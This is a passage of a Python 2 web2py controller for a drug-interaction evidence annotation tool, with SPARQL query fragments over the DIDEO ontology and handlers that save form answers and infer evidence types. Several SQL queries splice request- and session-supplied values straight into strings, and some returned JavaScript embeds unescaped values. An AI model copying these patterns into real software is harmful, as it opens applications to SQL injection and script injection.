SPARQL_HOST = '''http://localhost:8890/sparql'''
SPARQL_PREFIXES = '''
PREFIX obo: <http://purl.obolibrary.org/obo/>
PREFIX owl: <http://www.w3.org/2002/07/owl#>
PREFIX efo: <http://www.ebi.ac.uk/efo/>
'''
# SPARQL_GRAPH = '''<http://www.semanticweb.org/rdb20/ontologies/2017/8/dikb-etypes-09222017#>'''
# SPARQL_GRAPH = '''http://www.semanticweb.org/rdb20/ontologies/2018/1/dikb-etypes-0206018#'''
SPARQL_FROM_GRAPH = '''FROM <http://www.semanticweb.org/rdb20/ontologies/2018/1/dikb-etypes-04042018#>
FROM <http://purl.obolibrary.org/obo/dideo.owl#>'''
### END SPARQL header
### START retrieve evidence types (this goes AFTER the other parts specific to clinical trials, case reports, and experiements)
SPARQL_EV_TYPE = '''
?evItem a ?evType; # get all of the other evidence types this is classified as
obo:IAO_0000136 ?aItem. # an evidence item is about the assay item ?aItem
?evType rdfs:label ?label; # get the evidence type label...
obo:IAO_0000115 ?definition. # ...and definition(s)
FILTER NOT EXISTS {
?evItem a ?z.
?z rdfs:subClassOf ?evType.
}
'''
### END retrieve evidence types
### START of case report instance query parts
SPARQL_OBSERVATIONAL_REPORT = '''
?aItem obo:RO_0002404 ?pItem. # causally downstream of some occurrent
?pItem a obo:BFO_0000003.
'''
SPARQL_ADVERSE_EVENT = '''
# the occurrent IS an adverse event
?pItem a obo:OAE_0000005.
'''
SPARQL_NOT_ADVERSE_EVENT = '''
# the occurrent is NOT an adverse drug event
FILTER NOT EXISTS {
?pItem a obo:OAE_0000005.
}
'''
SPARQL_PRECEDED_BY_DRUG_ADMIN = '''
?pItem obo:BFO_0000062 ?da. # preceded by drug administration
?da a obo:DRON_00000031.
'''
SPARQL_NOT_PRECEDED_BY_DRUG_ADMIN = '''
FILTER NOT EXISTS {
?pItem obo:BFO_0000062 ?da. # preceded by drug administration
?da a obo:DRON_00000031.
}
'''
SPARQL_DDI_ROLES = '''
?da obo:RO_0000057 ?d1. # the drug administration has participant some entity that is the bearer of an object drug role
?d1 obo:RO_0000053 ?oRole.
?oRole a obo:DIDEO_00000012.
?da obo:RO_0000057 ?d2. # the drug administration has participant some entity that is the bearer of a precipitant drug role
?d2 obo:RO_0000053 ?precRole.
?precRole a obo:DIDEO_00000013.
'''
SPARQL_NOT_DDI_ROLES = '''
FILTER NOT EXISTS {
?da obo:RO_0000057 ?d1. # the drug administration has participant some entity that is the bearer of an object drug role
?d1 obo:RO_0000053 ?oRole.
?oRole a obo:DIDEO_00000012.
?da obo:RO_0000057 ?d2. # the drug administration has participant some entity that is the bearer of a precipitant drug role
?d2 obo:RO_0000053 ?precRole.
?precRole a obo:DIDEO_00000013.
}
'''
SPARQL_REPORT_IN_PUBLIC_DATABASE = '''
?eice a obo:DIDEO_00000053; # evidence information content entity
obo:IAO_0000136 ?aItem; # is about the assay
obo:BFO_0000050 ?prdb. # is part of a public reporting database
?prdb a obo:DIDEO_00000082.
'''
SPARQL_REPORT_NOT_IN_PUBLIC_DATABASE = '''
FILTER NOT EXISTS {
?eice a obo:DIDEO_00000053; # evidence information content entity
obo:IAO_0000136 ?aItem; # is about the assay
obo:BFO_0000050 ?prdb. # is part of a public reporting database
?prdb a obo:DIDEO_00000082.
}
'''
SPARQL_REPORT_EVALUATED_FOR_CAUSALITY = '''
?eice a obo:DIDEO_00000053; # evidence information content entity
obo:IAO_0000136 ?aItem; # is about the assay
obo:OBI_0000312 ?pp. # is specified output of planned process that is an ADE causality evaluation protocol
?pp obo:BFO_0000055 ?re. # (realizes a realizable entity...)
?re obo:RO_0000059 ?adeep. # (...that concretizes a planned process...)
?adeep a obo:DIDEO_00000087. # (... that is an ADE causality evaluation protocol)
'''
SPARQL_REPORT_NOT_EVALUATED_FOR_CAUSALITY = '''
FILTER NOT EXISTS {
?eice a obo:DIDEO_00000053; # evidence information content entity
obo:IAO_0000136 ?aItem; # is about the assay
obo:OBI_0000312 ?pp. # is specified output of planned process that is an ADE causality evaluation protocol
?pp obo:BFO_0000055 ?re. # (realizes a realizable entity...)
?re obo:RO_0000059 ?adeep. # (...that concretizes a planned process...)
?adeep a obo:DIDEO_00000087. # (... that is an ADE causality evaluation protocol)
}
'''
### END of case report instance query parts
### START of clinical trial instance query parts
SPARQL_RANDOMIZATION = '''
?aItem obo:BFO_0000051 ?pItem. # has_part
?pItem a obo:OBI_0302900. # group randomization design
'''
SPARQL_NO_RANDOMIZATION = '''
?gItem a owl:NegativePropertyAssertion;
owl:sourceIndividual ?aItem;
owl:targetIndividual obo:OBI_0302900. # an assay item is the source individual for a negative property assertion about group randomization
'''
SPARQL_PAR_GROUPS = '''
?aItem obo:BFO_0000055 ?rItem. # the assay realizes a design
?rItem a obo:BFO_0000017;
obo:RO_0000059 ?cItem. # the realizable entity concretizes a clinical study design
?cItem a obo:OBI_0500001;
obo:BFO_0000051 ?pItem. # the clinical study design has_part
?pItem a obo:OBI_0500006. # parallel group design
'''
SPARQL_NOT_PAR_GROUPS = '''
FILTER NOT EXISTS {
?aItem obo:BFO_0000055 ?rItem. # the assay realizes a design
?rItem a obo:BFO_0000017;
obo:RO_0000059 ?cItem. # the realizable entity concretizes a clinical study design
?cItem a obo:OBI_0500001;
obo:BFO_0000051 ?pItem. # the clinical study design has_part
?pItem a obo:OBI_0500006. # parallel group design
}
'''
SPARQL_PK = '''
?aItem obo:OBI_0000293 ?dItem1. # has specified input some drug
?dItem1 a obo:CHEBI_24431. # CHEBI chemical entity
?aItem obo:OBI_0000293 ?oItem1. # has specified input some organism
?oItem1 a obo:OBI_0100026; # dideo:organism
obo:RO_0000056 ?pItem1. # participates_in
?pItem1 a obo:DIDEO_00000052. # dideo:pharmacokinetic process
'''
SPARQL_NOT_PK = '''
?aItem obo:OBI_0000293 ?dItem1. # has specified input some drug
?dItem1 a obo:CHEBI_24431. # CHEBI chemical entity
?aItem obo:OBI_0000293 ?dItem2.FILTER(?dItem1 != ?dItem2) # has specified input some other drug
?dItem2 a obo:CHEBI_24431. # CHEBI chemical entity
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?oItem1. # has specified input some organism
?oItem1 a obo:OBI_0100026; # dideo:organism
obo:RO_0000056 ?pItem1. # participates_in
?pItem1 a obo:DIDEO_00000052. # dideo:pharmacokinetic process
}
'''
SPARQL_PHENOTYPE = '''
?aItem obo:OBI_0000293 ?oItem2. # has specified input some organism
?oItem2 a obo:OBI_0100026; # organism
obo:RO_0000056 ?pItem2. # participates_in
?pItem2 a obo:ERO_0000923. # phenotype characterization
'''
SPARQL_NOT_PHENOTYPE = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?oItem2. # has specified input some organism
?oItem2 a obo:OBI_0100026; # organism
obo:RO_0000056 ?pItem2. # participates_in
?pItem2 a obo:ERO_0000923. # phenotype characterization
}
'''
SPARQL_GENOTYPE = '''
?aItem obo:OBI_0000293 ?oItem3. # has specified input some organism
?oItem3 a obo:OBI_0100026; # organism
obo:RO_0000056 ?gItem3. # participates_in
?gItem3 a efo:EFO_0000750. # genotype characterization
'''
SPARQL_NOT_GENOTYPE = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?oItem3. # has specified input some organism
?oItem3 a obo:OBI_0100026; # organism
obo:RO_0000056 ?gItem3. # participates_in
?gItem3 a efo:EFO_0000750. # genotype characterization
}
'''
### END of clinical trial instance query parts
### START of in vitro metabolism experiments
SPARQL_IN_VITRO_DESIGN = '''
?aItem obo:BFO_0000055 ?re. # assay realizes a realizable entity...
?re obo:RO_0000059 ?ivd. # ...that concretizes an entity
?ivd a obo:OBI_0001285. # ... that is an in vitro study design
'''
SPARQL_NOT_IN_VITRO_DESIGN = '''
NOT EXISTS {
?aItem obo:BFO_0000055 ?re. # assay realizes a realizable entity...
?re obo:RO_0000059 ?ivd. # ...that concretizes an entity
?ivd a obo:OBI_0001285. # ... that is an in vitro study design
}
'''
SPARQL_METABOLISM_IDENTIFICATION = '''
?aItem obo:OBI_0000293 ?dItem1. # has specified input some ?dItem1
?dItem1 a obo:CHEBI_24431; # ?dItem1 a CHEBI chemical entity
obo:BFO_0000050 ?dp; # part of ?dp
obo:RO_0000056 ?mp. # participates in ?mp
?dp a obo:DRON_00000005. # ?dp is a drug product
?mp a obo:GO_0008152. # ?mp is a metabolic process
'''
SPARQL_NOT_METABOLISM_IDENTIFICATION = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?dItem1. # has specified input some ?dItem1
?dItem1 a obo:CHEBI_24431; # ?dItem1 a CHEBI chemical entity
obo:BFO_0000050 ?dp; # part of ?dp
obo:RO_0000056 ?mp. # participates in ?mp
?dp a obo:DRON_00000005. # ?dp is a drug product
?mp a obo:GO_0008152. # ?mp is a metabolic process
}
'''
SPARQL_METABOLISM_INHIBITION = '''
?aItem obo:OBI_0000293 ?dItem1. # has specified input some ?dItem1
?dItem1 a obo:CHEBI_24431; # ?dItem1 a CHEBI chemical entity
obo:BFO_0000050 ?dp; # part of ?dp
obo:RO_0000056 ?mp. # participates in ?mp
?dp a obo:DRON_00000005. # ?dp is a drug product
?mp a obo:GO_0009892. # ?mp is a negative regulation of metabolic process
'''
SPARQL_NOT_METABOLISM_INHIBITION = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?dItem1. # has specified input some ?dItem1
?dItem1 a obo:CHEBI_24431; # ?dItem1 a CHEBI chemical entity
obo:BFO_0000050 ?dp; # part of ?dp
obo:RO_0000056 ?mp. # participates in ?mp
?dp a obo:DRON_00000005. # ?dp is a drug product
?mp a obo:GO_0009892. # ?mp is a negative regulation of metabolic process
}
'''
SPARQL_INVOLVES_CYP450 = '''
?mp obo:RO_0000057 ?cyp. # ?mp has participant some ?cyp
?cyp a obo:CHEBI_38559.
'''
SPARQL_NOT_INVOLVES_CYP450 = '''
FILTER NOT EXISTS {
?mp obo:RO_0000057 ?cyp. # ?mp has participant some ?cyp
?cyp a obo:CHEBI_38559.
}
'''
SPARQL_INVOLVES_RECOMBINANT_SYSTEM = '''
?aItem obo:OBI_0000293 ?sysItem1. # has specified input some ?sysItem1
?sysItem1 a obo:CLO_0000031. # ?sysItem1 a cell line
'''
SPARQL_NOT_INVOLVES_RECOMBINANT_SYSTEM = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?sysItem1. # has specified input some ?sysItem1
?sysItem1 a obo:CLO_0000031. # ?sysItem1 a cell line
}
'''
SPARQL_INVOLVES_HUMAN_MICROSOMES = '''
?aItem obo:OBI_0000293 ?sysItem1. # has specified input some ?sysItem1
?sysItem1 a obo:OBI_0001479; # ?sysItem1 a tissue sample
obo:OBI_0000312 ?scp. # ?sysItem1 a specified output of ?scp
?scp a obo:OBI_0000659; # ?scp is a specimen collection process
obo:OBI_0000293 ?hs. # ?scp has specified input ?hs
#?hs a obo:NCBITaxon_9606. # ?hs of type Homo Sapiens
'''
SPARQL_NOT_INVOLVES_HUMAN_MICROSOMES = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?sysItem1. # has specified input some ?sysItem1
?sysItem1 a obo:OBI_0001479; # ?sysItem1 a tissue sample
obo:OBI_0000312 ?scp. # ?sysItem1 a specified output of ?scp
?scp a obo:OBI_0000659; # ?scp is a specimen collection process
obo:OBI_0000293 ?hs. # ?scp has specified input ?hs
#?hs a obo:NCBITaxon_9606. # ?hs of type Homo Sapiens
}
'''
SPARQL_INVOLVES_ANTIBODY_INHIBITOR = '''
?aItem obo:OBI_0000293 ?sysItem2. # has specified input some ?sysItem2
?sysItem2 a obo:GO_0042571; # ?sysItem2 a immunoglobulin complex, circulating
obo:RO_0000053 ?role. # ?sysItem2 is the bearer of ?role
?role a obo:CHEBI_35222. # ?role is an inhibitor
'''
SPARQL_NOT_INVOLVES_ANTIBODY_INHIBITOR = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?sysItem2. # has specified input some ?sysItem2
?sysItem2 a obo:GO_0042571; # ?sysItem2 a immunoglobulin complex, circulating
obo:RO_0000053 ?role. # ?sysItem2 is the bearer of ?role
?role a obo:CHEBI_35222. # ?role is an inhibitor
}
'''
SPARQL_INVOLVES_CHEMICAL_INHIBITOR = '''
?aItem obo:OBI_0000293 ?chemEnt. # has specified input some ?chemEnt
?chemEnt a obo:CHEBI_24431; # ?chemEnt a chemical entity
rdf:type [owl:complementOf obo:GO_0042571]; # ?chemEnt is not a immunoglobulin complex, circulating
obo:RO_0000053 ?role. # ?chemEn is the bearer of ?role
?role a obo:CHEBI_35222. # ?role is an inhibitor
'''
SPARQL_NOT_INVOLVES_CHEMICAL_INHIBITOR = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?chemEnt. # has specified input some ?chemEnt
?chemEnt a obo:CHEBI_24431; # ?chemEnt a chemical entity
rdf:type [owl:complementOf obo:GO_0042571]; # ?chemEnt is not a immunoglobulin complex, circulating
obo:RO_0000053 ?role. # ?chemEn is the bearer of ?role
?role a obo:CHEBI_35222. # ?role is an inhibitor
}
'''
### END of in vitro metabolism experiments
### START of in vitro transport experiments
SPARQL_EX_VIVO_DESIGN = '''
?aItem obo:BFO_0000055 ?re. # assay realizes a realizable entity...
?re obo:RO_0000059 ?ivd. # ...that concretizes an entity
?ivd a obo:OBI_0001211. # ... that is an ex vivo study design
'''
SPARQL_TRANSPORT_IDENTIFICATION = '''
?aItem obo:OBI_0000293 ?chemSubst1. # has specified input some ?chemSubst1
?chemSubst1 a obo:CHEBI_24431; # ?chemSubst1 a CHEBI chemical entity
obo:OBI_0000312 ?tp. # is specified output of ?tp
?tp a obo:GO_0098739; # ?tp is import across a plasma membrane
obo:RO_0000057 ?pt; # ?tp has participant some ?pt
obo:RO_0000057 ?chemSubst2. # ?tp has participant some ?chemSubst2
?pt a obo:CHEBI_36080. # ?pt a protein
?chemSubst2 a obo:CHEBI_24431; # ?chemSubst2 a CHEBI chemical entity
obo:BFO_0000050 ?dp. # part of ?dp
?dp a obo:DRON_00000005. # ?dp is a drug product
'''
SPARQL_TRANSPORT_INHIBITION = '''
?aItem obo:OBI_0000293 ?chemSubst1. # has specified input some ?chemSubst1
?chemSubst1 a obo:CHEBI_24431; # ?chemSubst1 a CHEBI chemical entity
obo:OBI_0000312 ?tp. # is specified output of ?tp
?tp a obo:GO_0032410; # ?tp is negative regulation of transporter activity
obo:RO_0000057 ?pt; # ?tp has participant some ?pt
obo:RO_0000057 ?chemSubst2. # ?tp has participant some ?chemSubst2
?pt a obo:CHEBI_36080. # ?pt a protein
?chemSubst2 a obo:CHEBI_24431; # ?chemSubst2 a CHEBI chemical entity
obo:BFO_0000050 ?dp. # part of ?dp
?dp a obo:DRON_00000005. # ?dp is a drug product
'''
SPARQL_OVEREXPRESSED_CELL_LINE = '''
?aItem obo:OBI_0000293 ?clc. # has specified input some ?clc
?clc a obo:CLO_0000001; # ?clc a cell line cell
obo:RO_0000056 ?ovx. # ?clc participates in ?ovx
?ovx a obo:INO_0000114. # ?ovx an overexpression
'''
SPARQL_NOT_OVEREXPRESSED_CELL_LINE = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?clc. # has specified input some ?clc
?clc a obo:CLO_0000001; # ?clc a cell line cell
obo:RO_0000056 ?ovx. # ?clc participates in ?ovx
?ovx a obo:INO_0000114. # ?ovx an overexpression
}
'''
SPARQL_CACO_2_CELL_LINE = '''
?aItem obo:OBI_0000293 ?cl. # has specified input some ?cl
?cl a obo:CLO_0002172. # ?cl a Caco 2 cell
'''
SPARQL_NOT_CACO_2_CELL_LINE = '''
FILTER NOT EXISTS {
?aItem obo:OBI_0000293 ?cl. # has specified input some ?cl
?cl a obo:CLO_0002172. # ?cl a Caco 2 cell
}
'''
SPARQL_OATP1B1 = '''
?pt a obo:PR_000015223. # ?pt is a solute carrier organic anion transporter family member 1B1
'''
SPARQL_NOT_OATP1B1 = '''
FILTER NOT EXISTS {
?pt a obo:PR_000015223. # ?pt is a solute carrier organic anion transporter family member 1B1
}
'''
SPARQL_OATP1B3 = '''
?pt a obo:PR_000015224. # ?pt is a solute carrier organic anion transporter family member 1B3
'''
SPARQL_NOT_OATP1B3 = '''
FILTER NOT EXISTS {
?pt a obo:PR_000015224. # ?pt is a solute carrier organic anion transporter family member 1B3
}
'''
SPARQL_P_GLYCOPROTEIN = '''
?pt a obo:PR_000001891. # ?pt is a multidrug resistance protein 1 (p-glycoprotein)
'''
SPARQL_NOT_P_GLYCOPROTEIN = '''
FILTER NOT EXISTS {
?pt a obo:PR_000001891. # ?pt is a multidrug resistance protein 1 (p-glycoprotein)
}
'''
### END of in vitro transport experiments
# this file is released under public domain and you can use without limitations
def index():
print "[INFO] form controller index..."
session.task_id = request.vars.task_id
if not session.task_id or not session.part_code:
print "[ERROR] participant code (%s) or task_id (%s) undefined!" % (session.part_code, session.task_id)
return
else:
print "participant (%s), task (%s)" % (session.part_code, session.task_id)
return dict()
# check if there is finished evidence type answers available to load
def loadEvidenceTypeQuestions():
sql1 = "SELECT evf.id, e.mp_method, e.inferred_evidence_type, e.is_agree_with_inference, e.entered_evidence_type FROM evidence_type e LEFT JOIN evidence_type_form evf ON e.evidence_type_form_id = evf.id WHERE e.participant_code = '%s' AND e.task_id = '%s';" % (session.part_code, session.task_id)
result = db.executesql(sql1)
if result:
ev_form_id, mp_method, inferred_ev, agree_inferred, entered_ev = result[0][0], result[0][1], result[0][2], result[0][3], result[0][4]
print "[INFO] load mp_method (%s), ev form (%s)" % (mp_method, ev_form_id)
jsonData = {"mp_method": mp_method, "inferred_evidence_type": inferred_ev, "is_agree_with_inference": agree_inferred, "entered_evidence_type": entered_ev, "questions": {}}
sql2 = "SELECT evq.ui_code, evq.answer FROM evidence_type_form evf JOIN evidence_type_question evq ON evf.id = evq.evidence_type_form_id WHERE evf.id = '%s'" % ev_form_id
questions = db.executesql(sql2)
for (code, answer) in questions:
jsonData["questions"][code] = answer
return json.dumps(jsonData)
# check if there is finished inclusion criteria answers available to load
def loadInclusionCriteriaQuestions(ic_form_id, mp_method):
sql1 = "SELECT icf.id, e.mp_method, e.is_meet_inclusion_criteria, e.is_agree_with_ic_result, confidence, disagree_comment FROM evidence_type e LEFT JOIN icl_form icf ON e.icl_form_id = icf.id WHERE e.participant_code = '%s' AND e.task_id = '%s';" % (session.part_code, session.task_id)
result = db.executesql(sql1)
if result:
ic_form_id, mp_method, ic_result, ic_agree, confidence, comment = result[0][0], result[0][1], result[0][2], result[0][3], result[0][4], result[0][5]
print "[INFO] load mp_method (%s), ic form (%s)" % (mp_method, ic_form_id)
jsonData = {"mp_method": mp_method, "is_meet_inclusion_criteria": ic_result, "is_agree_with_ic_result": ic_agree, "confidence": confidence, "disagree_comment": comment, "questions": {}}
#sql2 = "SELECT evq.ui_code, evq.answer FROM evidence_type_form evf JOIN evidence_type_question evq ON evf.id = evq.evidence_type_form_id WHERE evf.id = '%s'" % ev_form_id
sql2 = "SELECT icq.ui_code, icq.answer FROM icl_form icf JOIN icl_question icq ON icf.id = icq.icl_form_id WHERE icf.id = '%s'" % ic_form_id
questions = db.executesql(sql2)
for (code, answer) in questions:
jsonData["questions"][code] = answer
return json.dumps(jsonData)
## save evidence type questions to table evidence_type_form, evidence_type_question
def saveEvidenceTypeQuestions():
print '[INFO] form controller save evidence type questions'
print request.vars
if request.vars:
session.mp_method = request.vars.evidencetype
result = isEvidenceTypeFormExists()
if not result: # task and form not exists
ev_form_id = db.evidence_type_form.insert(is_started=True, is_finished=True)
session.ev_form_id = ev_form_id
saveEvidenceTypeQuestionsHelper(session.mp_method, request.vars, ev_form_id)
# create evidence_type when assist with inference
db.evidence_type.insert(task_id=session.task_id, participant_code=session.part_code, mp_method=session.mp_method, evidence_type_form_id=ev_form_id, is_started=True, is_finished=False)
else: # task and form exists, just update questions
ev_id, ev_form_id = result["id"], result["ev_form_id"]
session.ev_form_id = ev_form_id
session.mp_method = result["mp_method"]
saveEvidenceTypeQuestionsHelper(session.mp_method, request.vars, ev_form_id)
# evidence type inference
ietTpl = getInferredEvType(request.vars)
evType = ietTpl[0]
if ietTpl[1] == "":
ietDefandNotes = ""
else:
ietDefandNotes = "<i>Definition:</i> " + ietTpl[1]
if ietTpl[2] != "":
ietDefandNotes += "<br><i>Notes:</i> " + ietTpl[2]
ietCount = ietTpl[3]
ietUri = ietTpl[4]
if ietCount > 1:
evType = " There are %s evidence types that match the specific values you entered. Please revise your selections or click the 'Disagree' button below to manually select an evidence type." % str(ietCount)
ietDefandNotes = "<br><i>Suggestion:</i> The 'info' links next to each question provide definitions intended to help make selections."
r = '$("#inferred-evidencetype-div").css("display","block");$("#agree-with-inferred-div").css("display","block");jQuery("#inferred-evidencetype").val("%s");jQuery("#inferred-evidencetype-uri").val("%s");jQuery("#inferred-evidencetype-def").html(" %s");$("#calculate").hide();' % (evType, ietUri, ietDefandNotes)
return r
def isEvidenceTypeFormExists():
sql = "SELECT id, evidence_type_form_id, mp_method FROM evidence_type WHERE participant_code = '%s' AND task_id = '%s'" % (session.part_code, session.task_id)
result = db.executesql(sql)
print result
if result:
return {"id": result[0][0], "ev_form_id": result[0][1], "mp_method": result[0][2]}
return None
def saveEvidenceTypeQuestionsHelper(mp_method, data, ev_form_id):
if mp_method == "Clinical study":
insertEvQuestionsByCodes(global_ct_ev_qs_codes, data, ev_form_id)
elif mp_method == "Case Report":
insertEvQuestionsByCodes(global_cr_ev_qs_codes, data, ev_form_id)
elif mp_method == "Metabolic Experiment":
insertEvQuestionsByCodes(global_ex_mt_ev_qs_codes, data, ev_form_id)
elif mp_method == "Transport Experiment":
insertEvQuestionsByCodes(global_ex_tp_ev_qs_codes, data, ev_form_id)
else:
print "[ERROR] evidence type undefined (%s)" % mp_method
# insert question if not exists, otherwise update the answer
def insertEvQuestionsByCodes(ui_codes, data, ev_form_id):
for code in ui_codes:
if code in global_ev_qs_map:
question, answer = global_ev_qs_map[code], data[code]
if question and answer:
sql = "SELECT id FROM evidence_type_question WHERE evidence_type_form_id = '%s' and ui_code = '%s'" % (ev_form_id, code)
result = db.executesql(sql)
if result:
ev_question_id = result[0][0]
db(db.evidence_type_question.id == int(ev_question_id)).update(answer=answer)
else:
db.evidence_type_question.insert(evidence_type_form_id=ev_form_id, ui_code=code, question=question, answer=answer)
# save inferred evidence type
# show inclusion criteria questions
def agreeInferred():
print '[INFO] form controller save inferred evidence type...'
db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(inferred_evidence_type = request.vars["inferred-evidencetype"], inferred_evidence_type_uri = request.vars["inferred-evidencetype-uri"], is_agree_with_inference = True)
incCritQL = getEvInclCrit(request.vars["inferred-evidencetype-uri"])
# hide agree/disagree buttons, show inclusion criteria form
print '[INFO] showing inclusion criteria for session.mp_method = ' + session.mp_method
r = '$("#agree-with-inferred-div").css("display","none");showInclusionCriteriaByMethod("'+session.mp_method+'",%s);' % json.dumps(incCritQL)
return r
# save inferred and entered evidence type
# show inclusion criteria questions
def saveEnteredAndInferred():
print '[INFO] form controller save inferred and entered evidence type...'
db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(inferred_evidence_type = request.vars["inferred-evidencetype"], entered_evidence_type = request.vars["entered-evidencetype"], is_agree_with_inference = False)
# hide agree/disagree buttons, show inclusion criteria form
r = '$("#agree-with-inferred-div").css("display","none");showInclusionCriteriaByMethod("'+session.mp_method+'");'
return r
## save inclusion criteria questions to table icl_form, icl_question
def saveInclusionCriteriaQuestions():
print '[INFO] form controller save inclusion criteria questions...'
print '[INFO] request.vars: %s' % request.vars
session.mp_method = request.vars.confirmedEvType
ic_form_id = db.icl_form.insert(is_started=True, is_finished=True)
session.ic_form_id = ic_form_id
saveInclusionCriteriaQuestionsHelper(session.mp_method, request.vars, ic_form_id)
db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(icl_form_id = ic_form_id)
# get inclusion criteria result
ic_result_str = "No"
ic_result = getInclusionCriteriaResult()
if ic_result:
ic_result_str = "Yes"
db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(is_meet_inclusion_criteria = ic_result)
r = '$("#ic-div").css("display","block");$("#agree-with-ic-div").css("display","block");jQuery("#ic-result").val("%s");$("#calculate").hide();' % ic_result_str
return r
def saveInclusionCriteriaQuestionsHelper(mp_method, data, ic_form_id):
if mp_method == "Clinical study":
insertIcQuestionsByCodes(global_ct_ic_qs_codes, data, ic_form_id)
elif mp_method == "Case Report":
insertIcQuestionsByCodes(global_cr_ic_qs_codes, data, ic_form_id)
elif mp_method == "Metabolic Experiment":
insertIcQuestionsByCodes(global_ex_mt_ic_qs_codes, data, ic_form_id)
elif mp_method == "Transport Experiment":
insertIcQuestionsByCodes(global_ex_tp_ic_qs_codes, data, ic_form_id)
else:
print "[ERROR - saveInclusionCriteriaQuestionsHelper] evidence type undefined (%s)" % mp_method
def insertIcQuestionsByCodes(ui_codes, data, ic_form_id):
for code in ui_codes:
if code in global_ic_qs_map:
question, answer = global_ic_qs_map[code], data[code]
if question and answer:
db.icl_question.insert(icl_form_id=ic_form_id, ui_code=code, question=question, answer=answer)
# send sparql query to obtain all of the evidence inclusion criteria for the accepted evidence type and its parent classes
def getEvInclCrit(ev_type):
print "querying for all of the evidence inclusion criteria for the accepted evidence type and its parent classes: %s" % str(ev_type)
# set RDF store connection
tstore = SPARQLWrapper(SPARQL_HOST)
# start building the evidence type query
q = '''
PREFIX obo: <http://purl.obolibrary.org/obo/>
select distinct ?parEvType ?ic
where
{
{<%s> rdfs:subClassOf+ ?parEvType.
?parEvType <http://purl.obolibrary.org/obo/dideo.owl#DIDEO_EV_Inclusion_Criterion> ?ic.
}
UNION
{
OPTIONAL {
<%s> <http://purl.obolibrary.org/obo/dideo.owl#DIDEO_EV_Inclusion_Criterion> ?ic.
?parEvType <http://purl.obolibrary.org/obo/dideo.owl#DIDEO_EV_Inclusion_Criterion> ?ic.
}
}
}
''' % (ev_type.strip(),ev_type.strip())
print q
tstore.setQuery(q)
tstore.setReturnFormat(JSON)
qr = tstore.query().convert()
if len(qr["results"]["bindings"]) == 0:
print "results from sparql query is none "
evICRslt = "No inclusion criteria found!"
return None
# else, translate the returned IC into something presentable
print "results: %s" % qr
rgxSource = re.compile(r'Source:([^;]+);')
rgxLink = re.compile(r'Link:([^;]+);')
rgxId = re.compile(r'ID:([^;]+);')
rgxGroup = re.compile(r'Group:([^;]+);')
rgxAtag = re.compile(r'\((https://goo.gl/......)\) ')
incCritQL = []
for x in qr["results"]["bindings"]:
nd = {"icRaw":x["ic"]["value"]}
spltL = x["ic"]["value"].split('?')
if len(spltL) != 2:
print "ERROR: could not split on a question mark symbol - check the source annotation property in DIDEO: %s" % x["ic"]["value"]
return None
nd["icText"] = rgxAtag.sub(r'<a href="\1" target="new">\1</a> ', spltL[0].strip()) + '?'
m = rgxId.search(spltL[1])
if not m.group():
print "ERROR: could not extract ID from the annotation property. Check the format of the source annotation property in DIDEO: %s" % x["ic"]["value"]
return None
nd["icID"] = m.group(1).strip()
m = rgxGroup.search(spltL[1])
if not m.group():
print "ERROR: could not extract Group from the annotation property. Check the format of the source annotation property in DIDEO: %s" % x["ic"]["value"]
return None
nd["icGroup"] = m.group(1).strip()
m = rgxSource.search(spltL[1])
if not m.group():
print "ERROR: could not extract source reference from the annotation property. Check the format of the source annotation property in DIDEO: %s" % x["ic"]["value"]
return None
nd["icSourceRef"] = m.group(1).strip()
m = rgxLink.search(spltL[1])
if not m.group():
print "ERROR: could not extract reference link from the annotation property. Check the format of the source annotation property in DIDEO: %s" % x["ic"]["value"]
return None
nd["icSourceLink"] = m.group(1).strip()
incCritQL.append(nd)
# sort by Group
incCritQL.sort(key=lambda x:x["icGroup"])
print "Inclusion criteria after extracting metadata and sorting: %s" % incCritQL
return incCritQL
# send sparql query to virtuoso endpoint for specific evidence type inference
def getInferredEvType(data):
print "data as received by getInferredEvType: %s" % str(data)
# notes to pass on to the user to help with explanations
inferenceNotes = ""
# set RDF store connection
tstore = SPARQLWrapper(SPARQL_HOST)
# start building the evidence type query
q = SPARQL_PREFIXES + '''
SELECT distinct ?evItem ?evType ?label ?definition
''' + SPARQL_FROM_GRAPH + '''
WHERE {
?aItem a obo:OBI_0000070. # a study assay
'''
if not data.get('cr-ev-question-1'):
print "INFO: skipping case report questions"
else:
q = q + SPARQL_OBSERVATIONAL_REPORT
# adverse drug event report?
if data['cr-ev-question-1'] == 'yes':
q = q + SPARQL_ADVERSE_EVENT + SPARQL_PRECEDED_BY_DRUG_ADMIN
elif data['cr-ev-question-1'] == 'no':
q = q + SPARQL_NOT_ADVERSE_EVENT + SPARQL_NOT_PRECEDED_BY_DRUG_ADMIN
elif data['cr-ev-question-1'] == 'unsure':
q = q + SPARQL_NOT_ADVERSE_EVENT + SPARQL_NOT_PRECEDED_BY_DRUG_ADMIN
# Publicly (spontaneously) reported?
if data['cr-ev-question-2'] == 'yes':
q = q + SPARQL_REPORT_IN_PUBLIC_DATABASE
elif data['cr-ev-question-2'] == 'no':
q = q + SPARQL_REPORT_NOT_IN_PUBLIC_DATABASE
# Involves a suspected drug-drug interaction?
if data['cr-ev-question-4'] == 'yes':
q = q + SPARQL_DDI_ROLES
elif data['cr-ev-question-4'] == 'no':
q = q + SPARQL_NOT_DDI_ROLES
# Was an evaluation of adverse event causality conducted?
if data['cr-ev-question-3'] == 'yes':
q = q + SPARQL_REPORT_EVALUATED_FOR_CAUSALITY
elif data['cr-ev-question-3'] == 'no':
q = q + SPARQL_REPORT_NOT_EVALUATED_FOR_CAUSALITY
if not data.get('ct-ev-question-1'):
print "INFO: skipping clinical trial questions"
else:
# randomization?
if data['ct-ev-question-1'] == 'yes':
